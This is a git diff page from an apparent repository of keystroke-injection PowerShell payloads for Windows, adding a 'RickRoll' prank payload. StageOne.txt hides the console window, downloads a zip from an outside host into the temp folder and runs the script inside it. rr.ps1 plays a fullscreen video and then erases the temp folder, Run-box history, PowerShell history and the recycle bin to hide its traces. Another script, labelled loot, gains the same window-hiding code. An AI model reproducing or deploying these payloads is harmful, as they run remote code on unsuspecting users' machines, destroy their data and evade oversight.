Compare commits
7 commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 675199a37d | |||
|
9f3852cb81 | ||
|
|
51c3767407 | ||
|
|
663b339cc8 | ||
|
|
424e6b295b | ||
|
|
ffae1e9f4e | ||
|
|
2f714f6772 |
8 changed files with 87 additions and 31 deletions
|
|
@ -32,6 +32,11 @@
|
|||
|
||||
############################################################################################################################################################
|
||||
|
||||
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
|
||||
add-type -name win -member $i -namespace native;
|
||||
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
|
||||
|
||||
|
||||
# MAKE LOOT FOLDER, FILE, and ZIP
|
||||
|
||||
$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)"
|
||||
|
|
|
|||
5
Payloads/Flip-ADV-RickRoll/StageOne.txt
Normal file
5
Payloads/Flip-ADV-RickRoll/StageOne.txt
Normal file
|
|
@ -0,0 +1,5 @@
|
|||
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
|
||||
add-type -name win -member $i -namespace native;
|
||||
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
|
||||
|
||||
cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1
|
||||
BIN
Payloads/Flip-ADV-RickRoll/rr.mp4
Normal file
BIN
Payloads/Flip-ADV-RickRoll/rr.mp4
Normal file
Binary file not shown.
74
Payloads/Flip-ADV-RickRoll/rr.ps1
Normal file
74
Payloads/Flip-ADV-RickRoll/rr.ps1
Normal file
|
|
@ -0,0 +1,74 @@
|
|||
function Target-Comes {
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#############################################################################################################################################
|
||||
|
||||
|
||||
#WPF Library for Playing Movie and some components
|
||||
Add-Type -AssemblyName PresentationFramework
|
||||
|
||||
Add-Type -AssemblyName System.ComponentModel
|
||||
#XAML File of WPF as windows for playing movie
|
||||
|
||||
[xml]$XAML = @"
|
||||
|
||||
<Window xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
|
||||
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
|
||||
Title="PowerShell Video Player" WindowState="Maximized" ResizeMode="NoResize" WindowStartupLocation="CenterScreen" >
|
||||
<MediaElement Stretch="Fill" Name="VideoPlayer" LoadedBehavior="Manual" UnloadedBehavior="Stop" />
|
||||
</Window>
|
||||
"@
|
||||
|
||||
#Movie Path
|
||||
[uri]$VideoSource = "$env:TMP\rr.mp4"
|
||||
|
||||
#Devide All Objects on XAML
|
||||
$XAMLReader=(New-Object System.Xml.XmlNodeReader $XAML)
|
||||
$Window=[Windows.Markup.XamlReader]::Load( $XAMLReader )
|
||||
$VideoPlayer = $Window.FindName("VideoPlayer")
|
||||
|
||||
|
||||
#Video Default Setting
|
||||
$VideoPlayer.Volume = 100;
|
||||
$VideoPlayer.Source = $VideoSource;
|
||||
#$VideoPlayer.Padding = new Thickness(5);
|
||||
|
||||
|
||||
Target-Comes
|
||||
|
||||
$VideoPlayer.Play()
|
||||
|
||||
#Show Up the Window
|
||||
$Window.ShowDialog() | out-null
|
||||
|
||||
|
||||
# Turn of capslock if it is left on
|
||||
|
||||
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
|
||||
if ($caps -eq $true){$key = New-Object -ComObject WScript.Shell;$key.SendKeys('{CapsLock}')}
|
||||
|
||||
|
||||
# empty temp folder
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# delete run box history
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Empty recycle bin
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
BIN
Payloads/Flip-ADV-RickRoll/rr.zip
Normal file
BIN
Payloads/Flip-ADV-RickRoll/rr.zip
Normal file
Binary file not shown.
|
|
@ -1,32 +1,3 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# tiktok.com/@i_am_jakoby # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.DESCRIPTION
|
||||
This program is designed to get your target to subscribe to your YouTube channel.
|
||||
#>
|
||||
#############################################################################################################################################
|
||||
|
||||
# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself
|
||||
|
||||
# $channel = "https://www.youtube.com/iamjakoby"
|
||||
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
$url = -join($channel,"?sub_confirmation=1")
|
||||
|
|
|
|||
|
|
@ -98,6 +98,6 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
|||
|
||||
}
|
||||
|
||||
Target-Comes
|
||||
# Target-Comes
|
||||
Set-WallPaper -Image $wp -Style Fill
|
||||
Clean-Exfil
|
||||
# Clean-Exfil
|
||||
|
|
|
|||
|
|
@ -1 +1,2 @@
|
|||
#
|
||||
saps calc
|
||||
|
|
|
|||
Loading…
Reference in a new issue